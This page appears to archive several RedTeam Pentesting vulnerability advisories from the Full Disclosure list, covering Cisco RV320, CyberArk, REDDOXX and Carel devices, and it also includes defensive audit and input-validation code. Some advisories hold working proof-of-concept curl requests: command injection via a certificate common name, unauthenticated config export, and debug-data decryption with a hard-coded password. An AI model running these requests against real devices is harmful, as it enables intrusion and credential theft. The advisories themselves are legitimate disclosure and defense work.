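	Name    string
	Problem string
}

// AuditPasswd flags passwd entries whose password field (the second
// colon-separated field) is empty, i.e. enabled accounts such as "nobody"
// that can be used without any password.
func AuditPasswd(passwd string) []Finding {
	var out []Finding
	for _, line := range strings.Split(passwd, "\n") {
		line = strings.TrimSpace(line)
		if line == "" || strings.HasPrefix(line, "#") {
			continue
		}
		f := strings.Split(line, ":")
		if len(f) < 2 {
			continue
		}
		if f[1] == "" {
			out = append(out, Finding{f[0], "enabled account without a password"})
		}
	}
	return out
}

// AuditUserspwd flags KEY=value entries whose plaintext value is still the
// factory default or is empty. Unknown keys are only checked for emptiness.
func AuditUserspwd(cfg string) []Finding {
	var out []Finding
	for _, line := range strings.Split(cfg, "\n") {
		k, v, ok := strings.Cut(strings.TrimSpace(line), "=")
		if !ok {
			continue
		}
		def, known := DefaultPasswords[k]
		switch {
		case v == "":
			out = append(out, Finding{k, "empty password"})
		case known && v == def:
			out = append(out, Finding{k, "factory default password still set"})
		}
	}
	return out
}

// SamplePasswd is a constructed passwd file; the hashes are placeholders.
const SamplePasswd = `root:$1$PLACEHOLDER$PLACEHOLDERPLACEHOLDERPL:0:0:root:/root:/bin/sh
httpadmin:$1$PLACEHOLDER$PLACEHOLDERPLACEHOLDERPL:500:500::/:/bin/false
nobody::99:99:nobody:/:/bin/false
`

// SampleUserspwd is a constructed userspwd file with one changed password.
const SampleUserspwd = `PROOT=froot
PHTTP=Ch4nged-Web-Pass
PGUEST=
PCAREL=fcarel
`

func main() {
	for _, f := range AuditPasswd(SamplePasswd) {
		fmt.Printf("passwd:   %-10s %s\n", f.Name, f.Problem)
	}
	for _, f := range AuditUserspwd(SampleUserspwd) {
		fmt.Printf("userspwd: %-10s %s\n", f.Name, f.Problem)
	}
}
```

The check only confirms that defaults were changed and that no account is passwordless; the plaintext copies themselves remain on the card, which is why the advisory also asks for the card to be kept off networks reachable by untrusted users.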


Fix
===

No updated firmware will be published for pCOWeb Cards, as they are
obsolete since Dec 2017. A successor hardware with current firmware is
available for OEM integrators.


Security Risk
=============

Attackers with knowledge of one set of user credentials to a Carel
pCOWeb card could use the password hashes accessible to all users in
"/etc/passwd" or the plaintext copies of the passwords to gain
different privileges. Due to the necessity of access to credentials,
this is considered to pose a low risk only.


Timeline
========

2019-07-17 Vulnerability identified
2019-08-03 Customer approved disclosure to vendor
2019-09-02 Vendor notified
2019-09-09 Vendor did not respond as promised
2019-09-17 Vendor could not be reached
2019-09-18 Vendor could not be reached
2019-09-18 Vendor could not be reached
2019-10-28 Advisory published due to publication of CVE-2019-13553


References
==========

[0] 
https://www.carel.com/documents/10191/0/+030220471/9619472f-f1c0-4ec9-a151-120aaa5e479a?version=1.0
[1] https://www.redteam-pentesting.de/de/advisories/rt-sa-2019-014.txt



[FD] [RT-SA-2019-012] Information Disclosure in REDDOXX Appliance

2019-07-01 Thread RedTeam Pentesting GmbH
-

It provides details about the used license (serial number replaced by
random value for demonstration purposes):


{
  "version": "1.1",
  "id": "{----}",
  "result": {
    "License": {
      "Activated": true,
      "ActivationDate": "2000-01-01T12:34:56",
      "ApplianceID": "1234",
      "ArchiveLicenses": "1",
      "Cluster": false,
      "Customer": "Example Ltd.",
      "HasFullMaildepotLicense": true,
      "HasFullSpamfinderLicense": true,
      "HasMaildepotPremiumLicense": true,
      "MailDepotImporterLicense": false,
      "MailSealerLicenses": "1",
      "MailSealerSignatureLicense": false,
      "MsxAgentLicenses": "1",
      "SerialNumber": "AIP1-EECA-EUKI-E6AH-OOGH-EI5Y",
      "ServiceDate": "1899-12-30T00:00:00",
      "SpamfinderLicenses": "1",
      "SubscriptionDate": "2020-01-30T12:34:56",
      "Valid": true,
      "VirusScan": true
    }
  }
}



Workaround
==========

None


Fix
===

Install the latest hotfixes for the appliance, see [2].


Security Risk
=============

The risk of the information disclosure through the two API calls is
estimated to be low. Although the API calls should not be available
without authentication, "CoreService.GetRealmList" will only return
rudimentary information about the authentication realms and
"CoreService.GetLicense" is mostly a problem for the vendor, as the
serial number could be misused to set up a licensed application without
paying.


Timeline
========

2019-05-21 Vulnerability identified
2019-05-24 Customer approved disclosure to vendor
2019-06-04 Vendor notified
2019-06-05 Vendor acknowledges the vulnerability
2019-06-17 Vendor released hotfix
2019-06-24 Customer approved release
2019-07-01 Advisory released


References
==========

[0] https://www.reddoxx.com/en/
[1] https://my.reddoxx.com/documents/manual/en/custdl/product-downloads (requires login)
[2] 
https://appliance.docs.reddoxx.com/de/release-notes/release-notes-version-2032-service-pack-2-2-2-1242



[FD] [RT-SA-2019-002] Directory Traversal in Cisco Expressway Gateway

2019-05-17 Thread RedTeam Pentesting GmbH
closure for May 1st to RedTeam Pentesting
2019-05-01 Vendor publishes advisory
2019-05-16 Customer approves release of this advisory
2019-05-17 Advisory released


References
==========
[1] https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvo47769
[2] 
https://www.cisco.com/c/en/us/products/unified-communications/expressway-series/index.html
[3] 
https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Orange%20Tsai%20-%20Updated/DEFCON-26-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-and-Pop-0days-Out-Updated.pdf
[4] https://tomcat.apache.org



[FD] [RT-SA-2019-005] Cisco RV320 Command Injection Retrieval

2019-03-27 Thread RedTeam Pentesting GmbH
Advisory: Cisco RV320 Command Injection

RedTeam Pentesting discovered a command injection vulnerability in the
web-based certificate generator feature of the Cisco RV320 router which
was inadequately patched by the vendor.


Details
=======

Product: Cisco RV320 Dual Gigabit WAN VPN Router, possibly others
Affected Versions: 1.4.2.15 through 1.4.2.20
Fixed Versions: none
Vulnerability Type: Remote Code Execution
Security Risk: medium
Vendor URL: 
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject
Vendor Status: working on patch
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2019-005
Advisory Status: published
CVE: CVE-2019-1652
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1652


Introduction
============

"Keep your employees, your business, and yourself productive and
effective. The Cisco RV320 Dual Gigabit WAN VPN Router is an ideal
choice for any small office or small business looking for performance,
security, and reliability in its network."
(from the Cisco RV320 product page [1])


More Details
============

The router's web interface enables users to generate new X.509
certificates directly on the device. Previously, RedTeam Pentesting
identified a vulnerability (rt-sa-2018-004) [2] in this component. By
providing a specially crafted common name, it was possible to inject
shell commands which were subsequently executed on the router as the
root user. This vulnerability was addressed in firmware version 1.4.2.19
published by Cisco [3].

RedTeam Pentesting discovered that the certificate generator in the patched
firmware is still vulnerable. The update adds several filters to handle
single quotes in user input. However, these filters can be evaded by
specially crafted inputs. By providing the following string for the
certificate's common name, a "ping" command can be injected:


'a$(ping -c 4 192.168.1.2)'b



Proof of Concept
================

The following HTTP POST request invokes the certificate generator
function and triggers the command injection. It requires a valid session
cookie for the device's web interface. The user agent "curl" is
blacklisted by the firmware and must be adjusted in the HTTP client.


$ curl -s -k -A kurl -X POST -b "$COOKIE" \
--data "page=self_generator.htm=1=30"\
"=1_ch=1=4=A=A=A"\
"=A_unit=A=ab%40example.com"\
"=512=1024_days=30_c=1&"\
"SelectSubject_s=1" \
--data-urlencode "common_name='a\$(ping -c 4 192.168.1.2)'b" \
"https://192.168.1.1/certificate_handle2.htm?type=4;


Afterwards, the incoming ICMP echo requests can be observed on the
attacker's system at 192.168.1.2.


Workaround
==========

Prevent untrusted users from using the router's web interface.


Fix
===

None


Security Risk
=============

The vulnerability allows attackers with administrative access to the
router's web interface to execute arbitrary operating system commands on
the device. Because attackers require valid credentials to the web
interface, this vulnerability is only rated as a medium risk.


Timeline
========

2018-09-19 Original vulnerability identified
2018-09-27 Customer approved disclosure to vendor
2018-09-28 Vendor notified
2018-10-05 Receipt of advisory acknowledged by vendor
2018-10-05 Notified vendor of disclosure date: 2019-01-09
2018-12-21 Postponing disclosure to 2019-01-23, as requested by vendor
2019-01-16 List of affected versions provided by vendor
2019-01-22 Firmware 1.4.2.20 released by vendor
2019-01-23 Advisory (rt-sa-2018-004) published

2019-02-07 Incomplete mitigation of vulnerability identified
2019-02-08 Proof of concept sent to vendor
2019-02-08 Receipt of proof of concept acknowledged by vendor
2019-02-15 Full advisory sent to vendor
2019-02-15 Notified vendor of disclosure date: 2019-03-27
2019-03-25 Requested progress update from vendor
2019-03-25 Vendor requests postponed disclosure
2019-03-25 Postponement declined
2019-03-27 Advisory published


References
==========

[1] 
https://www.cisco.com/c/en/us/products/routers/rv320-dual-gigabit-wan-vpn-router/index.html
[2] https://www.redteam-pentesting.de/advisories/rt-sa-2018-004
[3] 
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject



[FD] [RT-SA-2019-004] Cisco RV320 Unauthenticated Diagnostic Data Retrieval

2019-03-27 Thread RedTeam Pentesting GmbH
ityAdvisory/cisco-sa-20190123-rv-info



[FD] [RT-SA-2019-003] Cisco RV320 Unauthenticated Configuration Export

2019-03-27 Thread RedTeam Pentesting GmbH
Advisory: Cisco RV320 Unauthenticated Configuration Export

RedTeam Pentesting discovered that the configuration of a Cisco RV320
router can still be exported without authentication via the device's web
interface due to an inadequate fix by the vendor.


Details
=======

Product: Cisco RV320 Dual Gigabit WAN VPN Router, possibly others
Affected Versions: 1.4.2.15 through 1.4.2.20
Fixed Versions: none
Vulnerability Type: Information Disclosure
Security Risk: high
Vendor URL: 
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info
Vendor Status: working on patch
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2019-003
Advisory Status: published
CVE: CVE-2019-1653
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1653


Introduction
============

"Keep your employees, your business, and yourself productive and
effective. The Cisco RV320 Dual Gigabit WAN VPN Router is an ideal
choice for any small office or small business looking for performance,
security, and reliability in its network."
(from the Cisco RV320 product page [1])


More Details
============

The Cisco RV320 Dual Gigabit WAN VPN Router provides a web-based
configuration interface, which is implemented in various CGI programs in
the device's firmware. Access to this web interface requires prior
authentication using a username and password. Previously, RedTeam
Pentesting identified a vulnerability (rt-sa-2018-002) [2] in the CGI
program:

/cgi-bin/config.exp

By issuing an HTTP GET request to this program, it was possible to
export a router's configuration without providing any prior
authentication. This vulnerability was addressed in firmware version
1.4.2.19 published by Cisco [3].

RedTeam Pentesting discovered that the CGI program in the patched
firmware is still vulnerable. By performing a specially crafted HTTP
POST request, attackers are still able to download the router's
configuration. The user agent "curl" is blacklisted by the firmware and
must be adjusted in the HTTP client. Again, exploitation does not
require any authentication.


Proof of Concept
================

A device's configuration can be retrieved by issuing an HTTP POST request
to the vulnerable CGI program (output shortened):


$ curl -s -k -A kurl -X POST --data 'submitbkconfig=0' \
  'https://192.168.1.1/cgi-bin/config.exp'
sysconfig
[VERSION]
VERSION=73
MODEL=RV320
SSL=0
IPSEC=0
PPTP=0
PLATFORMCODE=RV0XX
[...]
[SYSTEM]
HOSTNAME=router
DOMAINNAME=example.com
DOMAINCHANGE=1
USERNAME=cisco
PASSWD=066bae9070a9a95b3e03019db131cd40
[...]



Workaround
==========

Prevent untrusted clients from connecting to the device's web server.


Fix
===

None


Security Risk
=============

This vulnerability is rated as a high risk as it exposes the device's
configuration to untrusted, potentially malicious parties. By
downloading the configuration, attackers can obtain the internal network
configuration, VPN or IPsec secrets, as well as password hashes for the
router's user accounts. Knowledge of a user's password hash is
sufficient to log into the router's web interface; cracking the hash
is not required. Any information obtained through exploitation of this
vulnerability can be used to facilitate further compromise of the device
itself or attached networks.


Timeline
========

2018-09-19 Original vulnerability identified
2018-09-27 Customer approved disclosure to vendor
2018-09-28 Vendor notified
2018-10-05 Receipt of advisory acknowledged by vendor
2018-10-05 Notified vendor of disclosure date: 2019-01-09
2018-11-18 List of affected versions provided by vendor
2018-12-21 Postponing disclosure to 2019-01-23, as requested by vendor
2019-01-22 Firmware 1.4.2.20 released by vendor
2019-01-23 Advisory (rt-sa-2018-002) published

2019-02-07 Incomplete mitigation of vulnerability identified
2019-02-08 Proof of concept sent to vendor
2019-02-08 Receipt of proof of concept acknowledged by vendor
2019-02-15 Full advisory sent to vendor
2019-02-15 Notified vendor of disclosure date: 2019-03-27
2019-03-25 Requested progress update from vendor
2019-03-25 Vendor requests postponed disclosure
2019-03-25 Postponement declined
2019-03-27 Advisory published


References
==========

[1] 
https://www.cisco.com/c/en/us/products/routers/rv320-dual-gigabit-wan-vpn-router/index.html
[2] https://www.redteam-pentesting.de/advisories/rt-sa-2018-002
[3] 
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info



[FD] [RT-SA-2019-007] Code Execution via Insecure Shell Function getopt_simple

2019-03-26 Thread RedTeam Pentesting GmbH
 CVE ID requested
2019-03-21 CVE ID assigned
2019-03-26 Advisory released 


References
==========

[1] https://www.tldp.org/LDP/abs/html/
[2] https://www.tldp.org/LDP/abs/html/string-manipulation.html#GETOPTSIMPLE
[3] https://www.tldp.org/LDP/abs/html/internal.html#EX33
[4] https://www.tldp.org/LDP/abs/html/extmisc.html#EX33A



[FD] [RT-SA-2018-004] Cisco RV320 Command Injection

2019-01-24 Thread RedTeam Pentesting GmbH
Advisory: Cisco RV320 Command Injection

RedTeam Pentesting discovered a command injection vulnerability in the
web-based certificate generator feature of the Cisco RV320 router.


Details
=======

Product: Cisco RV320 Dual Gigabit WAN VPN Router, possibly others
Affected Versions: 1.4.2.15 and later
Fixed Versions: since 1.4.2.20
Vulnerability Type: Remote Code Execution
Security Risk: medium
Vendor URL: 
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2018-004
Advisory Status: published
CVE: CVE-2019-1652
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1652


Introduction
============

"Keep your employees, your business, and yourself productive and
effective. The Cisco RV320 Dual Gigabit WAN VPN Router is an ideal
choice for any small office or small business looking for performance,
security, and reliability in its network."
(from the Cisco RV320 product page [1])


More Details
============

The router's web interface enables users to generate new X.509
certificates directly on the device. A user may enter typical
configuration parameters required for the certificate, such as
organisation, the common name and so on. In order to generate the
certificate, the device uses the command-line program openssl [2]. The
device's firmware uses the following format string to assemble the
openssl command:


openssl req -new  -nodes  -subj 
'/C=%s/ST=%s/L=%s/O=%s/OU=%s/CN=%s/emailAddress=%s' -keyout %s%s.key -sha256 
-out %s%s.csr -days %s -newkey rsa:%s  > /dev/null 2>&1


Although the web interface filters certain special characters via
JavaScript, there is actually no input filtering, escaping or encoding
happening on the server. This allows attackers to inject arbitrary
commands.
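The following C program is an added illustration, not Cisco's firmware code and not taken from the advisory, of the defensive alternative to the format string above: every subject component is checked against an allow-list, and openssl is started with an argv array instead of a shell string, so the single-quote filtering that rt-sa-2019-005 later found evadable is not needed at all. The struct, function and file names and the sample subject values are hypothetical.

```c
/*
 * Added example (hypothetical names, not Cisco's firmware code).
 * The advisory describes user-controlled subject fields pasted into
 * "openssl req ... -subj '/C=%s/.../CN=%s/...'" and run through a shell.
 * Single quotes around the subject do not help: a quote inside the input
 * ends the quoted region and the rest, e.g. $(...), is parsed by the shell.
 * Two measures below make that impossible: an allow-list per component and
 * fork/execvp with an argv array, so no shell ever sees the input.
 */
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

#define MAX_COMPONENT 64

/* Allow-list check for one subject component: letters, digits, space and a
 * few safe punctuation characters. Everything else, including the shell
 * metacharacters ' $ ( ) ` and the -subj separators / and =, is rejected. */
int subject_component_is_safe(const char *s)
{
    size_t n = strlen(s);
    if (n == 0 || n > MAX_COMPONENT)
        return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)s[i];
        if (isalnum(c) || c == ' ' || c == '.' || c == '-' || c == '_' || c == '@')
            continue;
        return 0;
    }
    return 1;
}

struct subject {
    const char *c, *st, *l, *o, *ou, *cn, *email;
};

/* Builds the -subj value "/C=.../ST=.../.../emailAddress=..." into out.
 * Returns 1 on success; returns 0 and leaves out empty if any component
 * fails validation or the buffer is too small. */
int build_subject(const struct subject *s, char *out, size_t outsz)
{
    static const char *const labels[] = { "C", "ST", "L", "O", "OU", "CN", "emailAddress" };
    const char *const vals[] = { s->c, s->st, s->l, s->o, s->ou, s->cn, s->email };
    size_t used = 0;

    if (outsz == 0)
        return 0;
    out[0] = '\0';
    for (size_t i = 0; i < 7; i++) {
        if (!subject_component_is_safe(vals[i])) {
            out[0] = '\0';
            return 0;
        }
        int n = snprintf(out + used, outsz - used, "/%s=%s", labels[i], vals[i]);
        if (n < 0 || (size_t)n >= outsz - used) {
            out[0] = '\0';
            return 0;
        }
        used += (size_t)n;
    }
    return 1;
}

/* Runs openssl with an argv array via fork/execvp. No shell parses the
 * arguments, so an unexpected character in subj could at most change the
 * certificate's subject, never the command that is executed. (days and
 * bits should be validated as decimal numbers by the caller.) Returns
 * openssl's exit status, 127 if it could not be started, -1 on failure. */
int generate_csr(const char *subj, const char *keyfile, const char *csrfile,
                 const char *days, const char *bits)
{
    char newkey[32];
    snprintf(newkey, sizeof newkey, "rsa:%s", bits);
    char *const argv[] = {
        "openssl", "req", "-new", "-nodes", "-sha256", "-subj", (char *)subj,
        "-keyout", (char *)keyfile, "-out", (char *)csrfile,
        "-days", (char *)days, "-newkey", newkey, NULL
    };
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execvp("openssl", argv);
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed inputs: the two payload shapes from the advisories and a benign CN. */
    const char *cns[] = { "a'$(ping -c 4 192.168.1.2)'b",
                          "'a$(ping -c 4 192.168.1.2)'b", "router.example.com" };
    for (int i = 0; i < 3; i++) {
        struct subject s = { "DE", "NRW", "Aachen", "Example Ltd", "IT", cns[i], "ab@example.com" };
        char subj[512];
        if (!build_subject(&s, subj, sizeof subj)) {
            printf("rejected CN: %s\n", cns[i]);
            continue;
        }
        int rc = generate_csr(subj, "/tmp/example.key", "/tmp/example.csr", "30", "2048");
        printf("accepted CN: %s -> openssl exit status %d\n", cns[i], rc);
    }
    return 0;
}
```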


Proof of Concept
================

Even though all components of the subject seem to be vulnerable to
command injection, the following example uses the common name to trigger
a ping command:


a'$(ping -c 4 192.168.1.2)'b


The following HTTP POST request invokes the certificate generator
function and triggers the command injection. It requires a valid session
cookie for the device's web interface.


curl -s -b "$COOKIE" \
--data "page=self_generator.htm=1=30"\
"=1_ch=1=4=A=A=A"\
"=A_unit=A=ab%40example.com"\
"=512=1024_days=30_c=1&"\
"SelectSubject_s=1" \
--data-urlencode "common_name=a'\$(ping -c 4 192.168.1.2)'b" \
"http://192.168.1.1/certificate_handle2.htm?type=4;


Afterwards, the incoming ICMP echo requests can be observed on the
attacker's system at 192.168.1.2.


Workaround
==========

Prevent untrusted users from using the router's web interface.


Fix
===

Install firmware version 1.4.2.20 (or later) on the router.


Security Risk
=============

The vulnerability allows attackers with administrative access to the
router's web interface to execute arbitrary operating system commands on
the device. Because attackers require valid credentials to the web
interface, this vulnerability is only rated as a medium risk.


Timeline
========

2018-09-19 Vulnerability identified
2018-09-27 Customer approved disclosure to vendor
2018-09-28 Vendor notified
2018-10-05 Receipt of advisory acknowledged by vendor
2018-10-05 Notified vendor of disclosure date: 2019-01-09
2018-12-21 Postponing disclosure to 2019-01-23, as requested by vendor
2019-01-16 List of affected versions provided by vendor
2019-01-23 Advisory published


References
==========

[1] 
https://www.cisco.com/c/en/us/products/routers/rv320-dual-gigabit-wan-vpn-router/index.html
[2] https://wiki.openssl.org/index.php/Command_Line_Utilities



[FD] [RT-SA-2018-003] Cisco RV320 Unauthenticated Diagnostic Data Retrieval

2019-01-24 Thread RedTeam Pentesting GmbH
Advisory: Cisco RV320 Unauthenticated Diagnostic Data Retrieval

RedTeam Pentesting discovered that the Cisco RV320 router exposes
sensitive diagnostic data without authentication through the device's
web interface.


Details
=======

Product: Cisco RV320 Dual Gigabit WAN VPN Router, possibly others
Affected Versions: 1.4.2.15, 1.4.2.17
Fixed Versions: since 1.4.2.19
Vulnerability Type: Information Disclosure
Security Risk: high
Vendor URL: 
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2018-003
Advisory Status: published
CVE: CVE-2019-1653
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1653


Introduction
============

"Keep your employees, your business, and yourself productive and
effective. The Cisco RV320 Dual Gigabit WAN VPN Router is an ideal
choice for any small office or small business looking for performance,
security, and reliability in its network."
(from the Cisco RV320 product page [1])


More Details
============

The Cisco RV320 Dual Gigabit WAN VPN Router provides a web-based
configuration interface. In the device's firmware, this functionality is
implemented using a variety of CGI programs. Access to this web
interface requires prior authentication using a username and password.
RedTeam Pentesting discovered the CGI program:

/cgi-bin/export_debug_msg.exp

This program can be used to retrieve various diagnostic information from
the device, which includes its current configuration. In contrast to
other functions, this CGI program does not require any form of
authentication. It may be accessed through the router's web server,
which is available from the LAN by default. As described in [2],
firmware versions 1.4.2 through 1.4.2.15 (inclusive) also expose the web
server to the WAN on TCP port 8007.


Proof of Concept
================

The diagnostic data can be retrieved by issuing an HTTP POST request to
the vulnerable CGI program. OpenSSL is used to decrypt the data with the
hard-coded password "NKDebug12#$%" before unpacking it with tar (output
shortened):


$ curl --data submitdebugmsg=1 \
  'http://192.168.1.1/cgi-bin/export_debug_msg.exp' > debug

$ openssl aes-128-cbc -salt -md md5 -d \
  -k 'NKDebug12#$%' < debug > debug.tgz

$ mkdir output && tar -xf debug.tgz -C output/

$ ls -1 output/
debug_messages.txt
etc.tgz
nk_sysconfig
var.tgz

$ cat output/nk_sysconfig
sysconfig
[VERSION]
VERSION=73
MODEL=RV320
SSL=0
IPSEC=0
PPTP=0
PLATFORMCODE=RV0XX
[...]
[SYSTEM]
HOSTNAME=router
DOMAINNAME=example.com
DOMAINCHANGE=1
USERNAME=cisco
PASSWD=066bae9070a9a95b3e03019db131cd40
[...]



Workaround
==========

Prevent untrusted clients from connecting to the device's web server.


Fix
===

Install firmware version 1.4.2.19 (or later) on the router.


Security Risk
=============

This vulnerability is rated as a high risk as it exposes sensitive
diagnostic information, such as the device's configuration, to
untrusted, potentially malicious parties. By retrieving this
information, attackers can obtain internal network configuration, VPN or
IPsec secrets, as well as password hashes for the router's user
accounts. Knowledge of a user's password hash is sufficient to log into
the router's web interface. Any information obtained through
exploitation of this vulnerability can be used to facilitate further
compromise of the device itself or attached networks.


Timeline
========

2018-09-19 Vulnerability identified
2018-09-27 Customer approved disclosure to vendor
2018-09-28 Vendor notified
2018-10-05 Receipt of advisory acknowledged by vendor
2018-10-05 Notified vendor of disclosure date: 2019-01-09
2018-11-18 List of affected versions provided by vendor
2018-12-21 Postponing disclosure to 2019-01-23, as requested by vendor
2019-01-23 Advisory published


References
==========

[1] 
https://www.cisco.com/c/en/us/products/routers/rv320-dual-gigabit-wan-vpn-router/index.html
[2] https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvg42801



[FD] [RT-SA-2018-002] Cisco RV320 Unauthenticated Configuration Export

2019-01-24 Thread RedTeam Pentesting GmbH
Advisory: Cisco RV320 Unauthenticated Configuration Export

RedTeam Pentesting discovered that the configuration of a Cisco RV320
router may be exported without authentication through the device's web
interface.


Details
=======

Product: Cisco RV320 Dual Gigabit WAN VPN Router, possibly others
Affected Versions: 1.4.2.15, 1.4.2.17
Fixed Versions: since 1.4.2.19
Vulnerability Type: Information Disclosure
Security Risk: high
Vendor URL: 
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2018-002
Advisory Status: published
CVE: CVE-2019-1653
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1653


Introduction
============

"Keep your employees, your business, and yourself productive and
effective. The Cisco RV320 Dual Gigabit WAN VPN Router is an ideal
choice for any small office or small business looking for performance,
security, and reliability in its network."
(from the Cisco RV320 product page [1])


More Details
============

The Cisco RV320 Dual Gigabit WAN VPN Router provides a web-based
configuration interface. In the device's firmware, this functionality is
implemented using a variety of CGI programs. Access to this web
interface requires prior authentication using a username and password.
RedTeam Pentesting discovered the CGI program:

/cgi-bin/config.exp

This program can be used to export the router's configuration. In
contrast to other functions, this CGI program does not require any form
of authentication. It may be accessed through the router's web server,
which is available from the LAN by default. As described in [2],
firmware versions 1.4.2 through 1.4.2.15 (inclusive) also expose the web
server to the WAN on TCP port 8007.


Proof of Concept
================

A device's configuration can be retrieved by issuing an HTTP GET request
to the vulnerable CGI program (output shortened):


$ curl -s http://192.168.1.1/cgi-bin/config.exp
sysconfig
[VERSION]
VERSION=73
MODEL=RV320
SSL=0
IPSEC=0
PPTP=0
PLATFORMCODE=RV0XX
[...]
[SYSTEM]
HOSTNAME=router
DOMAINNAME=example.com
DOMAINCHANGE=1
USERNAME=cisco
PASSWD=066bae9070a9a95b3e03019db131cd40
[...]



Workaround
==========

Prevent untrusted clients from connecting to the device's web server.


Fix
===

Install firmware version 1.4.2.19 (or later) on the router.


Security Risk
=============

This vulnerability is rated as a high risk as it exposes the device's
configuration to untrusted, potentially malicious parties. By
downloading the configuration, attackers can obtain internal network
configuration, VPN or IPsec secrets, as well as password hashes for the
router's user accounts. Knowledge of a user's password hash is
sufficient to log into the router's web interface. Any information
obtained through exploitation of this vulnerability can be used to
facilitate further compromise of the device itself or attached networks.


Timeline
========

2018-09-19 Vulnerability identified
2018-09-27 Customer approved disclosure to vendor
2018-09-28 Vendor notified
2018-10-05 Receipt of advisory acknowledged by vendor
2018-10-05 Notified vendor of disclosure date: 2019-01-09
2018-11-18 List of affected versions provided by vendor
2018-12-21 Postponing disclosure to 2019-01-23, as requested by vendor
2019-01-23 Advisory published


References
==========

[1] 
https://www.cisco.com/c/en/us/products/routers/rv320-dual-gigabit-wan-vpn-router/index.html
[2] https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvg42801



[FD] [RT-SA-2017-015] CyberArk Password Vault Memory Disclosure

2018-04-09 Thread RedTeam Pentesting GmbH
36f 7264 7300 2968 b8fb aae9  s_records.)h
0110: 62


Starting at offset 0xe0, the vault discloses a total of 49 bytes of its
memory to the client.


Workaround
==========

None


Fix
===

Upgrade CyberArk Password Vault to version 9.7 or 10.


Security Risk
=============

This vulnerability is rated as a high risk. Exploitation only requires
network access to a PrivateArk Password Vault. Although each request
only discloses about 50 bytes of memory, sustained exploitation will
likely reveal sensitive information at some point in time. This
critically undermines the primary purpose of the PrivateArk Password
Vault.


Timeline
========

2017-11-24 Vulnerability identified
2018-01-22 Customer approved disclosure to vendor
2018-02-05 Vendor notified
2018-04-06 CVE number requested
2018-04-07 CVE number assigned
2018-04-09 Advisory released


References
==========

[1] 
http://lp.cyberark.com/rs/316-CZP-275/images/ds-enterprise-password-vault-11-15-17.pdf



[FD] [RT-SA-2017-014] CyberArk Password Vault Web Access Remote Code Execution

2018-04-09 Thread RedTeam Pentesting GmbH


Next, an API call is invoked which includes the malicious .NET object in
its authorization header. This is done with cURL [3] as follows:


$ curl -s -X GET -k \
  --url 'https://10.0.0.6/PasswordVault/WebServices/PIMServices.svc/'\
  'Applications/?Location=\=true' \
  --header "authorization: $(cat execute-ping.txt)" \
  --header 'content-type: application/json'


Simultaneously, tcpdump [4] is invoked on the host 10.0.0.19 to listen
for ICMP packets originating from the web server:


$ sudo tcpdump -i enp0s25 icmp
tcpdump: verbose output suppressed[...]
listening on enp0s25[...]

IP 10.0.0.6 > 10.0.0.19: ICMP echo request, id 1, seq 6, length 40
IP 10.0.0.19 > 10.0.0.6: ICMP echo reply, id 1, seq 6, length 40


The fact that ICMP packets are received from the web server indicates
that attacker-controlled code was executed.


Workaround
==

Disable any access to the API at the route /PasswordVault/WebServices.


Fix
===

Upgrade CyberArk Password Vault Web Access to version 9.9.5, 9.10 or
10.2.


Security Risk
=

The risk of this vulnerability is rated as high. Attackers with access
to the PrivateArk Vault Web Access REST API may execute arbitrary code
on the web server. No credentials are required. Attackers gain access to
the system with the privileges of the web application. Consequently,
such access may be used to backdoor the web application and compromise
further accounts and credentials. Additionally, attackers may pivot from
the web server to attack the vault directly.


Timeline


2017-11-24 Vulnerability identified
2018-01-22 Customer approved disclosure to vendor
2018-02-05 Vendor notified
2018-02-28 Vendor released fixed version
2018-04-06 CVE number requested
2018-04-07 CVE number assigned
2018-04-09 Advisory released


References
==

[1] 
http://lp.cyberark.com/rs/316-CZP-275/images/ds-enterprise-password-vault-11-15-17.pdf
[2] https://github.com/pwntester/ysoserial.net
[3] https://curl.haxx.se/
[4] https://www.tcpdump.org/



[FD] [RT-SA-2017-012] Shopware Cart Accessible by Third-Party Websites

2018-03-13 Thread RedTeam Pentesting GmbH
Advisory: Shopware Cart Accessible by Third-Party Websites

RedTeam Pentesting discovered that the shopping cart implemented by Shopware
offers an insecure API. Malicious, third-party websites may abuse this API to
list, add or remove products from a user's cart.


Details
===

Product: Shopware
Affected Versions: 4.0.1 - 5.3.7
Fixed Versions: > 5.4.0
Vulnerability Type: Cross-Site Request Forgery
Security Risk: low
Vendor URL: https://shopware.com
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2017-012
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
